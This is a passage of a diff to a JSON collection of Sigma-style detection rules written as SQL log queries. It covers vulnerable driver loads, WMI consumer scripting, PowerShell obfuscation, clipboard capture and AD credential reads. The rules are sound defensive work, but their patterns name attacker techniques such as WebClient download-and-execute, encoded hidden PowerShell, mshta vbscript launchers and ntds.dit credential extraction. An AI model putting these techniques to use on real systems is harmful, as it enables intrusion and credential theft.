'%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "NTLMv1 Logon Between Client and Server", - "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects the 
reporting of NTLMv1 being used between a client and server", - "author": "Tim Shelton", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1550.002", - "attack.s0363" + "attack.t1059.005" ], "falsepositives": [ - "Environments that use NTLMv1" + "Legitimate administrative scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_lsasrv_ntlmv1.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - 
"attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "PowerShell Decompress Commands", + "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "status": "test", + "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" + "filename": "posh_pm_decompress_commands.yml" }, { - "title": "Windows Update Error", - "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "status": "test", - "description": "Windows Update get some error Check if need a 0-days KB", - "author": "frack113", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "status": "experimental", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_susp_system_update_error.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1070.003" ], "falsepositives": [ - "Unlikely" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') 
AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate use of the tool" + "Administrator PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", - "status": "experimental", - "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = 
'4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Use Get-NetTCPConnection - PowerShell Module", + "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_susp_get_nettcpconnection.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, 
Natalia Shornikova", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", + "status": "experimental", + 
"description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the library for administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "author": "Nikita Nazarov, oscd.community", 
@@ -4634,1522 +4197,1490 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Application Uninstalled", - "id": "570ae5ec-33dc-427c-b815-db86228ad43e", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "An application has been removed. 
Check if it is critical.", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_builtin_remove_application.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' 
